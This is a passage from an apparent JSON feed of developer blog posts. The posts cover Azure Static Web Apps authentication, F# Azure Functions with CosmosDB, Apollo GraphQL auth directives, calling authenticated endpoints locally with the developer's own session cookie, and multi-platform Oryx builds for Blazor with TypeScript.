deployed version of the sample.\nError loading GitHub repo\nConclusion Static Web Apps does a good job of giving us the building blocks for creating an authenticated experience. In this post we’ve looked at how we can take those building blocks and create a rich user profile, provided by the underlying GitHub API.\nAlthough this sample is GitHub centric, there’s no reason you can’t apply the pattern against any other authentication provider, including custom ones. 
You could even make an API that looks at the identityProvider property of the clientPrincipal and call Azure AD, Twitter, or any other provider in use.\nI’d also suggest that you explore how you can effectively cache this data locally, either in a user store in Azure, or in the browser using localStorage or sessionStorage, but there are privacy considerations and data purging to think of, which is beyond the scope of what I wanted to cover in this post.\nHopefully this helps you create apps with richer user profiles.\n", "id": "2021-07-16-adding-user-profiles-to-swa" }, { "title": "Azure Functions, F# and CosmosDB Output Bindings", "url": "https://www.aaron-powell.com/posts/2021-07-11-functions-cosmosdb-output-bindings-and-fsharp/", "date": "Sun, 11 Jul 2021 23:25:38 +0000", "tags": [ "serverless", "azure", "functions", "dotnet", "fsharp" ], "description": "Let's look at how to work with Azure Functions output bindings from F#, specifically for CosmosDB", "content": "While building the demo application from last week’s On .NET Live stream I needed to write some data to CosmosDB and figured I’d use the output bindings. With the docs only containing C# examples (at least, at the time of writing), I thought I’d use this post to show how to do it in F#.\nout arguments One way in which we can use an output binding is to have an out argument, essentially somewhere that you’re passing a reference to a variable that the host will send to CosmosDB. Since out is a C# keyword we need to use the F# equivalent, which is outref<T>:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 namespace Demo type ToDo = { Id: string Description: string } module CreateToDo = [<FunctionName("CreateGame")>] let run ([<QueueTrigger("todoqueueforwrite")>] queueMessage: string) ([<CosmosDB("ToDoItems", "Items", ConnectionStringSetting = "CosmosConnection")>] todo: outref<ToDo>) (log: ILogger) = todo <- { Id = Guid.NewGuid().ToString(); Description = queueMessage } log.LogInformation "F# Queue trigger function inserted one row" log.LogInformation (sprintf "Description=%s" queueMessage); In this example, we have the outref<ToDo> as the second argument of our Function and we use the <- operator to do assignment to the mutable value (outref is a mutable reference, similar to how let mutable makes a mutable binding).\nDealing with async Here’s a slightly more challenging problem: if you’re doing something that requires an asynchronous process to happen, like reading the request body, and then writing to the output binding, we can’t use outref<T>, as the way async operations work (whether it’s Task or Async based) means that you can’t capture an outref parameter (nor in C# can you use an out parameter in an async function).\nThis is what the IAsyncCollector<T> is for; it gives us an interface which we can push output to from within an async operation.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 namespace Demo type ToDo = { Id: string Description: string } module CreateToDo = [<FunctionName("CreateGame")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = null)>] req: HttpRequest) ([<CosmosDB("ToDoItems", "Items", ConnectionStringSetting = "CosmosConnection")>] todos: IAsyncCollector<ToDo>) (log: ILogger) = async { use stream = new StreamReader(req.Body) let! reqBody = stream.ReadToEndAsync() |> Async.AwaitTask do!
{ Id = Guid.NewGuid().ToString(); Description = reqBody } |> todos.AddAsync |> Async.AwaitIAsyncResult |> Async.Ignore return OkResult() } |> Async.StartAsTask In this example, we’re reading the req.Body stream and then creating a new record that is passed to the IAsyncCollector.AddAsync, and since it returns Task, not Task<T>, we need to ignore the result.\nLastly, we convert the async block to Task<T> using Async.StartAsTask, since the Functions host requires Task<T> to be returned. You could optimise this code using Ply or TaskBuilder.fs, but I kept it simple for this example.\nConclusion This post shows how we can use the CosmosDB output bindings for Azure Functions from F# in the two most common scenarios, outputting a single item directly or outputting an item as part of an async operation.\nYou’ll find a much more complete example in the demo app I built.\n", "id": "2021-07-11-functions-cosmosdb-output-bindings-and-fsharp" }, { "title": "Controlling Serialisation of CosmosDB Bindings for Azure Functions", "url": "https://www.aaron-powell.com/posts/2021-07-09-controlling-serialisation-of-cosmosdb-bindings-for-azure-functions/", "date": "Fri, 09 Jul 2021 04:29:50 +0000", "tags": [ "azure", "serverless", "azure-functions", "dotnet" ], "description": "Do you want to do changes to how CosmosDB serialises/deserialises data in the Azure Function bindings? Then have a read of this post.", "content": "While preparing the content for the live stream I did today I came across a problem with how the data in CosmosDB was being handled. The sample data set I was using had camel-case field names, such as correctAnswer and incorrectAnswer, while the casing on the F# record types was pascal-case (CorrectAnswer and IncorrectAnswer), and this was causing problems in the serialisation/deserialisation of the data.\nSince I was using the input and output bindings for CosmosDB I don’t control the serialisation/deserialisation of the data, so how do we get around this?\nUnder the hood the bindings use Newtonsoft.Json and that has a singleton that we can set the global configuration on, but there’s a problem: where do we do that in a Functions project? We don’t control the startup of the Function, so how do we set the configuration?\nAfter some digging I came across the Microsoft.Azure.Functions.Extensions NuGet package (source) which provides a FunctionsStartup class. Now this looks promising.\nThis class gives us a method public abstract void Configure(IFunctionsHostBuilder builder) which will be executed when it initialises the Functions.
One of the uses for this class is to do dependency injection, by adding services to the IFunctionsHostBuilder, but in our case we don’t need to do that; instead, we can use the method to set up our own configuration for JSON serialisation/deserialisation.\nHere’s the F# implementation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 module Startup open Microsoft.Azure.Functions.Extensions.DependencyInjection open Newtonsoft.Json open Newtonsoft.Json.Serialization open Newtonsoft.Json.Converters type Startup() = inherit FunctionsStartup() override _.Configure(_: IFunctionsHostBuilder) : unit = let settings = JsonSerializerSettings() settings.ContractResolver <- CamelCasePropertyNamesContractResolver() DiscriminatedUnionConverter() |> settings.Converters.Add StringEnumConverter() |> settings.Converters.Add JsonConvert.DefaultSettings <- (fun _ -> settings) [<assembly: FunctionsStartup(typeof<Startup>)>] do () In the Configure method we’re creating a new instance of the JsonSerializerSettings, setting the default contract resolver to be the CamelCasePropertyNamesContractResolver and then adding a few additional converters (to play nicer with F# types) before setting this as the default settings.\nTo make the Function host aware of this class we need to add the assembly-level attribute FunctionsStartup (with the typeof reference), and now we’re controlling how the input and output binding for CosmosDB works.\nHopefully this helps you the next time you’re wanting to apply global configuration to Azure Functions.\n", "id": "2021-07-09-controlling-serialisation-of-cosmosdb-bindings-for-azure-functions" }, { "title": "Learn About F# and Web Development", "url": "https://www.aaron-powell.com/posts/2021-07-09-learn-about-fsharp-and-web-development/", "date": "Fri, 09 Jul 2021 03:43:33 +0000", "tags": [ "azure", "serverless", "fsharp", "web", "dotnet" ], "description": "Check out our live stream on F# and web development, with Fable and Azure Functions", "content": "Every week my colleague Cecil Philips hosts On .NET Live, an hour of live streaming about all things .NET.\nHe invited me on this week to talk about F# and web development, specifically how we can do serverless web development with F# and Azure Functions. This was a chance for me to show off some of the awesome community projects such as Fable and Feliz, which make it easy to build client-side JavaScript applications, but done using F#.\nWe talked about how to create Azure Functions with F#, I showed how you can get started using some GitHub repo templates to simplify a dev environment using Fable + Functions, and we finished by looking at an app I built using this stack and have deployed to Static Web Apps.\nCheck out the session on the dotnet YouTube channel.\n", "id": "2021-07-09-learn-about-fsharp-and-web-development" }, { "title": "Creating Static Web Apps With F# and Fable", "url": "https://www.aaron-powell.com/posts/2021-07-09-creating-static-web-apps-with-fsharp-and-fable/", "date": "Fri, 09 Jul 2021 00:56:43 +0000", "tags": [ "azure", "serverless", "web", "fsharp", "dotnet" ], "description": "Some templates to make it easier to get started with F# and Static Web Apps", "content": "While I’ve done lots of stuff with F# over the years, it’s pretty much all centred around apps on the server. With Azure Static Web Apps being a big area for myself these days I’ve been looking at the role that F# plays with it.\nThis led me to have a proper look at Fable.
Fable is an F# to JavaScript compiler, meaning you can write F# code and have it compiled to JavaScript, which is then run in the browser (or in a Node.js/Electron/etc. but I’m focusing on the browser usage).\nSo, in an effort to make it easier to get started with Fable and Static Web Apps, I’ve put together three GitHub repo templates. All the templates have a common Azure Function backend (using F#), use Paket for dependency management, Vite for bundling the JavaScript (I wanted to avoid webpack), Thoth.Fetch for calling the API and a VS Code Remote Container config to set up an F# environment. For the client, there’s Fable, Feliz (a React DSL in F#) and Elmish (a Model-View-Update pattern).\nI’ve also included some instructions on deploying to SWA, as it’s a bit trickier than a normal app.\nCheck out the templates, and let me know if there’s anything you’d like to see in them to make it easier to get started with F# and Static Web Apps.\n", "id": "2021-07-09-creating-static-web-apps-with-fsharp-and-fable" }, { "title": "GraphQL on Azure: Part 7 - Server-side Authentication", "url": "https://www.aaron-powell.com/posts/2021-07-05-graphql-on-azure-part-7-server-side-authentication/", "date": "Mon, 05 Jul 2021 01:51:57 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "It's time to talk authentication, and how we can do that with GraphQL on Azure", "content": "In our journey into GraphQL on Azure we’ve only created endpoints that can be accessed by anyone. In this post we’ll look at how we can add authentication to our GraphQL server.\nFor the post, we’ll use the Apollo Server and Azure Static Web Apps for hosting the API, mainly because SWA provides security (and if you’re wondering, this is how I came across the need to write this last post).\nIf you’re new to GraphQL on Azure, I’d encourage you to check out part 3 in which I go over how we can create a GraphQL server using Apollo and deploy that to an Azure Function, which is the process we’ll be using for this post.\nCreating an application The application we’re going to use today is a basic blog application, in which someone can authenticate and create a new post with markdown before saving it (it’ll just use an in-memory store). People can then comment on a post, but only if they are logged in.\nLet’s start by defining a set of types for our schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 type Comment { id: ID! comment: String! author: Author! } type Post { id: ID! title: String! body: String! author: Author! comments: [Comment!]! comment(id: ID!): Comment } type Author { id: ID! userId: String! name: String! email: String } We’ll add some queries and mutations, along with the appropriate input types:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 type Query { getPost(id: ID!): Post getAllPosts(count: Int! = 5): [Post!]! getAuthor(userId: String!): Author } input CreatePostInput { title: String! body: String! authorId: ID! } input CreateAuthorInput { name: String! email: String userId: String! } input CreateCommentInput { postId: ID! authorId: ID! comment: String! } type Mutations { createPost(input: CreatePostInput!): Post! createAuthor(input: CreateAuthorInput!): Author! createComment(input: CreateCommentInput!): Post! } schema { query: Query mutation: Mutations } And now we have our schema ready to use.
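Since this post skips over how the resolvers work, here's a minimal sketch (not the actual sample code) of how an in-memory store and a couple of the Query resolvers for this schema might look; the array names and record shapes below are illustrative assumptions:
// Illustrative in-memory store; the real sample's data shapes may differ.
type AuthorRecord = { id: string; userId: string; name: string; email?: string };
type PostRecord = { id: string; title: string; body: string; authorId: string };

const authors: AuthorRecord[] = [];
const posts: PostRecord[] = [];

const resolvers = {
  Query: {
    getPost: (_: unknown, { id }: { id: string }) =>
      posts.find(post => post.id === id),
    getAllPosts: (_: unknown, { count }: { count: number }) =>
      posts.slice(0, count),
    getAuthor: (_: unknown, { userId }: { userId: string }) =>
      authors.find(author => author.userId === userId)
  },
  Post: {
    // The Author relationship is resolved from the flat store rather than being stored inline
    author: (post: PostRecord) => authors.find(author => author.id === post.authorId)
  }
};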
So let’s talk about authentication.\nAuthentication in GraphQL Authentication in GraphQL is an interesting problem, as the language doesn’t provide anything for it, but instead relies on the server to provide the authentication and for you to work out how that is applied to the queries and mutations that schema defines.\nApollo provides some guidance on authentication, through the use of a context function that has access to the incoming request. We can use this function to unpack the SWA authentication information and add it to the context object. To get some help here, we’ll use the @aaronpowell/static-web-apps-api-auth library, as it can tell us if someone is logged in and unpack the client principal from the header.\nLet’s implement a context function to add the authentication information from the request (for this post, I’m going to skip over some of the building blocks and implementation details, such as how resolvers work, but you can find them in the complete sample at the end):\n1 2 3 4 5 6 7 8 9 10 const server = new ApolloServer({ typeDefs, resolvers, context: ({ request }: { request: HttpRequest }) => { return { isAuthenticated: isAuthenticated(request), user: getUserInfo(request) }; } }); Here we’re using the npm package to set the isAuthenticated and user properties of the context, which works by unpacking the SWA authentication information from the header (you don’t need my npm package, it’s just helpful).\nApplying Authentication with custom directives This context object will be available in all resolvers, so we can check if someone is authenticated and the user info, if required. So now that that’s available, how do we apply the authentication rules to our schema? It would make sense to have something at a schema level to handle this, rather than a set of inline checks within the resolvers, as then it’s clear to someone reading our schema what the rules are.\nGraphQL Directives are the answer. Directives are a way to add custom behaviour to GraphQL queries and mutations. They’re defined in the schema, and can be applied to a type, field, argument or query/mutation.\nLet’s start by defining a directive that, when applied somewhere, requires a user to be authenticated:\n1 directive @isAuthenticated on OBJECT | FIELD_DEFINITION This directive can be applied to any object type or field definition, and the resolver will only run if the isAuthenticated property of the context is true. So, where shall we use it? The logical first place is on all mutations that happen, so let’s update the mutation section of the schema:\n1 2 3 4 5 type Mutations @isAuthenticated { createPost(input: CreatePostInput!): Post! createAuthor(input: CreateAuthorInput!): Author! createComment(input: CreateCommentInput!): Post! } We’ve now added @isAuthenticated to the Mutations Object Type in the schema. We could have added it to each of the Field Definitions, but it’s easier to just add it to the Mutations Object Type, since we want it on all mutations. Right now, we don’t have any query that would require authentication, so let’s just stick with the mutations.\nImplementing a custom directive Defining the Directive in the schema only tells GraphQL that this is a thing that the server can do, but it doesn’t actually do anything.
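To see what the directive is going to save us from, here's roughly the inline check we'd otherwise have to repeat in every mutation resolver (the resolver body is illustrative, not the sample's actual implementation):
import { AuthenticationError } from "apollo-server-azure-functions";

type Context = { isAuthenticated: boolean };

const resolvers = {
  Mutations: {
    createPost: (_parent: unknown, _args: { input: unknown }, context: Context) => {
      // Without the directive, this check gets copied into every mutation.
      if (!context.isAuthenticated) {
        throw new AuthenticationError("Operation requires an authenticated user");
      }
      // ...create and return the post here
    }
  }
};
The directive lets us declare that rule once in the schema instead.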
We need to implement it somehow, and we do that in Apollo by creating a class that inherits from SchemaDirectiveVisitor.\n1 2 3 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor {} As this directive can support either Object Types or Field Definitions we’ve got two methods that we need to implement:\n1 2 3 4 5 6 7 8 9 10 11 12 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) {} visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) {} } To implement these methods, we’re going to need to override the resolve function of the fields, whether it’s all fields of the Object Type, or a single field. To do this we’ll create a common function that will be called:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) { this.ensureFieldsWrapped(type); type._authRequired = true; } visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) { this.ensureFieldsWrapped(details.objectType); field._authRequired = true; } ensureFieldsWrapped(objectType: GraphQLObjectType) {} } You’ll notice that we always pass in a GraphQLObjectType (either the argument or unpacking it from the field details), and that’s so we can normalise the wrapper function for all the things we need to handle. We’re also adding a _authRequired property to the field definition or object type, so we can check if authentication is required.\nNote: If you’re using TypeScript, as I am in this codebase, you’ll need to extend the type definitions to have the new fields as follows:\n1 2 3 4 5 6 7 8 9 10 11 12 import { GraphQLObjectType, GraphQLField } from "graphql"; declare module "graphql" { class GraphQLObjectType { _authRequired: boolean; _authRequiredWrapped: boolean; } class GraphQLField<TSource, TContext, TArgs = { [key: string]: any }> { _authRequired: boolean; } } It’s time to implement ensureFieldsWrapped:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ensureFieldsWrapped(objectType: GraphQLObjectType) { if (objectType._authRequiredWrapped) { return; } objectType._authRequiredWrapped = true; const fields = objectType.getFields(); for (const fieldName of Object.keys(fields)) { const field = fields[fieldName]; const { resolve = defaultFieldResolver } = field; field.resolve = isAuthenticatedResolver(field, objectType, resolve); } } We’re going to first check if the directive has been applied to this object already or not, since the directive might be applied multiple times, we don’t need to wrap what’s already wrapped.\nNext, we’ll get all the fields off the Object Type, loop over them, grab their resolve function (if defined, otherwise we’ll use the default GraphQL field resolver) and then wrap that function with our isAuthenticatedResolver function.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 const isAuthenticatedResolver = ( field: GraphQLField<any, any>, objectType: GraphQLObjectType, resolve: typeof defaultFieldResolver ): typeof defaultFieldResolver => (...args) => { const authRequired = field._authRequired || objectType._authRequired; if (!authRequired) { return resolve.apply(this, args); } const context = args[2]; if (!context.isAuthenticated) { throw new 
AuthenticationError( "Operation requires an authenticated user" ); } return resolve.apply(this, args); }; This is kind of like partial application, but in JavaScript, we’re creating a function that takes some arguments and in turn returns a new function that will be used at runtime. We’re going to pass in the field definition, the object type, and the original resolve function, as we’ll need those at runtime, so this captures them in the closure scope for us.\nFor the resolver, it is going to look to see if the field or object type required authentication, if not, return the result of the original resolver.\nIf it did, we’ll grab the context (which is the 3rd argument to an Apollo resolver), check if the user is authenticated, and if not, throw an AuthenticationError, which is provided by Apollo, and if they are authenticated, we’ll return the original resolvers result.\nUsing the directive We’ve added the directive to our schema, created an implementation of what to do with that directive, all that’s left is to tell Apollo to use it.\nFor this, we’ll update the ApolloServer in our index.ts file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 const server = new ApolloServer({ typeDefs, resolvers, context: ({ request }: { request: HttpRequest }) => { return { isAuthenticated: isAuthenticated(request), user: getUserInfo(request) }; }, schemaDirectives: { isAuthenticated: IsAuthenticatedDirective } }); The schemaDirectives property is where we’ll tell Apollo to use our directive. It’s a key/value pair, where the key is the directive name, and the value is the implementation.\nConclusion And we’re done! This is a pretty simple example of how we can add authentication to a GraphQL server using a custom directive that uses the authentication model of Static Web Apps.\nWe saw that using a custom directive allows us to mark up the schema, indicating, at a schema level, which fields and types require authentication, and then have the directive take care of the heavy lifting for us.\nYou can find the full sample application, including a React UI on my GitHub, and the deployed app is here, but remember, it’s an in-memory store so the data is highly transient.\nBonus - restricting data to the current user If we look at the Author type, there’s some fields available that we might want to restrict to just the current user, such as their email or ID. Let’s create an isSelf directive that can handle this for us.\n1 2 3 4 5 6 7 8 directive @isSelf on OBJECT | FIELD_DEFINITION type Author { id: ID! @isSelf userId: String! @isSelf name: String! email: String @isSelf } With this we’re saying that the Author.name field is available to anyone, but everything else about their profile is restricted to just them. 
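Before implementing it, it helps to know what context.user holds: the client principal that Static Web Apps passes to the API in the x-ms-client-principal header, which the auth helper decodes for us. Roughly, the shape looks like this (a sketch, not the library's exact typings):
type ClientPrincipal = {
  identityProvider: string;
  userId: string; // what the isSelf directive will compare against Author.userId
  userDetails: string;
  userRoles: string[];
};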
Now we can implement that directive:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 import { UserInfo } from "@aaronpowell/static-web-apps-api-auth"; import { AuthenticationError, SchemaDirectiveVisitor } from "apollo-server-azure-functions"; import { GraphQLObjectType, defaultFieldResolver, GraphQLField } from "graphql"; import { Author } from "../generated"; import "./typeExtensions"; const isSelfResolver = ( field: GraphQLField<any, any>, objectType: GraphQLObjectType, resolve: typeof defaultFieldResolver ): typeof defaultFieldResolver => (...args) => { const selfRequired = field._isSelfRequired || objectType._isSelfRequired; if (!selfRequired) { return resolve.apply(this, args); } const context = args[2]; if (!context.isAuthenticated || !context.user) { throw new AuthenticationError( "Operation requires an authenticated user" ); } const author = args[0] as Author; const user: UserInfo = context.user; if (author.userId !== user.userId) { throw new AuthenticationError( "Cannot access data across user boundaries" ); } return resolve.apply(this, args); }; export class IsSelfDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) { this.ensureFieldsWrapped(type); type._isSelfRequired = true; } visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) { this.ensureFieldsWrapped(details.objectType); field._isSelfRequired = true; } ensureFieldsWrapped(objectType: GraphQLObjectType) { if (objectType._isSelfRequiredWrapped) { return; } objectType._isSelfRequiredWrapped = true; const fields = objectType.getFields(); for (const fieldName of Object.keys(fields)) { const field = fields[fieldName]; const { resolve = defaultFieldResolver } = field; field.resolve = isSelfResolver(field, objectType, resolve); } } } This directive does take an assumption on how it’s being used, as it assumes that the first argument to the resolve function is an Author type, meaning it’s trying to resolve the Author through a query or mutation return, but otherwise it works very similar to the isAuthenticated directive, it ensures someone is logged in, and if they are, it ensures that the current user is the Author requested, if not, it’ll raise an error.\n", "id": "2021-07-05-graphql-on-azure-part-7-server-side-authentication" }, { "title": "Calling Static Web Apps Authenticated API Endpoints", "url": "https://www.aaron-powell.com/posts/2021-07-02-calling-static-web-apps-authenticated-endpoints/", "date": "Fri, 02 Jul 2021 03:30:41 +0000", "tags": [ "javascript", "azure", "webdev" ], "description": "Authenticated SWA endpoints can be tricky to test, as you don't control the headers... until now!", "content": "Static Web Apps provides built in authentication and authorisation, as well as BYO options (like Auth0 or Okta) and this is all handled by the SWA platform.\nFor local development, we can use the cli tool that can simulate how an authenticated experience works for local dev, without the hassle of setting up custom OAuth endpoints or anything like that.\nThis all works together nicely to make it easy to build authenticated experiences, test them locally and then deploy to Azure.\nThe problem While working on some content for an upcoming post, I hit a problem. 
I was building an authenticated experience and I wanted to test calling the API, but didn’t want to have to click through all the screens that would get me to that point. I just wanted to use something like REST Client for VS Code (or Postman, Insomnia, Fiddler, etc.) to call a specific API endpoint in an authenticated manner.\nBut since we go via the cli, or in production, the SWA proxy (I’m not sure it’s really a proxy server, but that’s what I call the thing that sits in front of your web and API endpoints to handle routing/auth/etc.), and not directly to the API, it poses a problem… how does auth happen? It’s just taken care of by the platform, headers are injected, auth tokens are created, and as a user, you don’t need to think about it.\nHow SWA tracks auth It’s time to get under the hood of Static Web Apps and try and work out how we can tell it that this inbound request from REST Client is authenticated and to pass the user information to the Functions backend.\nSince we don’t have access to the Static Web Apps source code, we’ll have to dig around in the cli; although it’s not the same code, it has to do something similar to set the right headers.\nThe cli works by intercepting the requests that come in and sending them to either the web app, API or its built-in mock auth server, and for the API, that happens here, with the thing we’re specifically looking for (setting the headers) happening in this callback. This calls the injectClientPrincipalCookies method and now we’re starting to get somewhere.\nWhat it’s doing is looking for a specific cookie, named StaticWebAppsAuthCookie, which becomes the header that you unpack in the API to get the user info (or use my nifty JavaScript library).\nSimulating auth from REST tools We now know the value that is expected by the cli to pass to the API, and it’s something that we can get by opening the web app and going through an auth flow, then open up the browser dev tools and go to the Application tab -> Cookies:\nCopy the cookie value, and it’s time to use your favourite REST tool; I’ll be using REST Client for VS Code, and for the app I’m using my Auth0 SWA sample.\nLet’s create an initial API call:\n### Local GET http://localhost:4280/api/get-message Now, if you click the Send Request option above the request name it’ll give you back a response in a new tab:\nHTTP/1.1 200 OK connection: close date: Fri, 02 Jul 2021 05:42:49 GMT content-type: text/plain; charset=utf-8 server: Kestrel transfer-encoding: chunked This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. There is no logged in user Nice! Our API is working; next up is to add the cookie to the request. With REST Client, we do that by adding a Cookie header, and custom headers are added to a request as subsequent lines from the one containing the HTTP request:\n### Local GET http://localhost:4280/api/get-message Cookie: StaticWebAppsAuthCookie=<your cookie value here> I’m logged in with a mock user that has the userDetails value of test_user@auth0.com, so the response is:\nHTTP/1.1 200 OK connection: close date: Fri, 02 Jul 2021 05:45:16 GMT content-type: text/plain; charset=utf-8 server: Kestrel transfer-encoding: chunked This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. The user is test_user@auth0.com 🎉 We are making an authenticated request from an external tool to SWA.
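The same trick works from code as well as from REST tools; here's a rough sketch of making that request from a Node script, with the cookie value again being the one copied from the browser dev tools:
import http from "node:http";

const cookieValue = "<your cookie value here>";

// Same request as above, with the SWA auth cookie attached by hand.
http.get(
  "http://localhost:4280/api/get-message",
  { headers: { Cookie: `StaticWebAppsAuthCookie=${cookieValue}` } },
  res => {
    let body = "";
    res.on("data", chunk => (body += chunk));
    res.on("end", () => console.log(body));
  }
);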
If you want to do this against a deployed SWA app, it’s the same process, although the cookie is a lot bigger (I assume it’s doing some better security than the cli 🤣) and I take no responsibility for it breaking down the track, as I don’t know how the cookie is really used!\nConclusion Static Web Apps authentication is great for adding security to an API, but it does become a little more challenging when we want to call that API from tools that we’re commonly using for API testing.\nThankfully, we’re able to simulate this by injecting a cookie into our requests that will "trick" the cli (and Azure) into thinking it was an authenticated request, passing the right user information down to the API.\nJust be aware - trying to poke too much at security against the Azure resource is probably not the best idea, but then again, we don’t want to dev against production, do we… 😉\n", "id": "2021-07-02-calling-static-web-apps-authenticated-endpoints" }, { "title": "Blazor, TypeScript and Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-06-24-blazor-typescript-and-static-web-apps/", "date": "Thu, 24 Jun 2021 00:30:52 +0000", "tags": [ "javascript", "webdev", "dotnet" ], "description": "Let's look at how we can solve the deployment when using Blazor and TypeScript in a single SWA project", "content": "While Blazor can do most things that you need in a web application, there’s always a chance that you’ll end up having to leverage the JavaScript interop feature, either to call JavaScript from the .NET code or to call something in .NET from JavaScript.\nI was recently asked about how we can handle this better with Static Web Apps (SWA), especially in the case when you’re using TypeScript.\nLet’s talk about the problem and how to solve it.\nThe problem The problem that we hit when using TypeScript and Blazor together is how SWA’s build pipeline works. We consume the build and deploy process using a GitHub Action (or Azure Pipelines task) like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_GENTLE_SEA_0D5D75010 }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for Github integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig app_location: "Client" # App source code path api_location: "Api" # Api source code path - optional output_location: "wwwroot" # Built app content directory - optional ###### End of Repository/Build Configurations ###### This job is a wrapper around the Oryx build engine, and this is what does the heavy lifting in terms of building the app ready for deployment to Azure.\nOryx works by looking at the folder to build and finding specific files, like a csproj or package.json, to work out what runtime/SDK is needed to build the app.
In this hypothetical case of a Blazor + TypeScript application, we’ll have both of those files and this causes some confusion for Oryx, what should it build?\nLet’s take a look at a build log:\n---Oryx build logs--- Operation performed by Microsoft Oryx, https://github.com/Microsoft/Oryx You can report issues at https://github.com/Microsoft/Oryx/issues Oryx Version: 0.2.20210410.1, Commit: e73613ae1fd73c809c00f357f8df91eb984e1158, ReleaseTagName: 20210410.1 Build Operation ID: |A51vi7/GHfw=.702339dd_ Repository Commit : 9d372641619c66a1251375ce5fcd5ed11399fa49 Detecting platforms... Detected following platforms: nodejs: 14.15.1 dotnet: 3.1.13 Version '14.15.1' of platform 'nodejs' is not installed. Generating script to install it... Version '3.1.13' of platform 'dotnet' is not installed. Generating script to install it... Source directory : /github/workspace/Client Destination directory: /bin/staticsites/ss-oryx/app Downloading and extracting 'nodejs' version '14.15.1' to '/tmp/oryx/platforms/nodejs/14.15.1'... Downloaded in 0 sec(s). Verifying checksum... Extracting contents... Done in 2 sec(s). Downloading and extracting 'dotnet' version '3.1.407' to '/tmp/oryx/platforms/dotnet/3.1.407'... Downloaded in 2 sec(s). Verifying checksum... Extracting contents... Done in 5 sec(s). Using Node version: v14.15.1 Using Npm version: 6.14.8 Running 'npm install --unsafe-perm'... npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN Client@1.0.0 No description npm WARN Client@1.0.0 No repository field. up to date in 0.232s found 0 vulnerabilities Running 'npm run build'... > Client@1.0.0 build /github/workspace/Client > tsc Preparing output... Copying files to destination directory '/bin/staticsites/ss-oryx/app'... Done in 0 sec(s). Removing existing manifest file Creating a manifest file... Manifest file created. Done in 9 sec(s). ---End of Oryx build logs--- Excellent, we’ve detected that there is both nodejs and dotnet needed, but if we look at it a bit further, we’ll see that it only ran npm run build, it didn’t run a dotnet publish, which we need to get the Blazor artifacts.\nAnd here is the problem, Oryx only builds a single platform, meaning our application can’t be deployed.\nThe solution Oryx knows about the two different platforms required and has gone ahead and installed them, but it doesn’t know that we want to do a multi-platform build.\nThankfully, this is something that we can solve using Oryx’s configuration, specifically ENABLE_MULTIPLATFORM_BUILD. All we need to do is add this to the env of the SWA job and we’re off and running:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 env: ENABLE_MULTIPLATFORM_BUILD: true with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_GENTLE_SEA_0D5D75010 }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for Github integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations - These values can be configured to match your app requirements. 
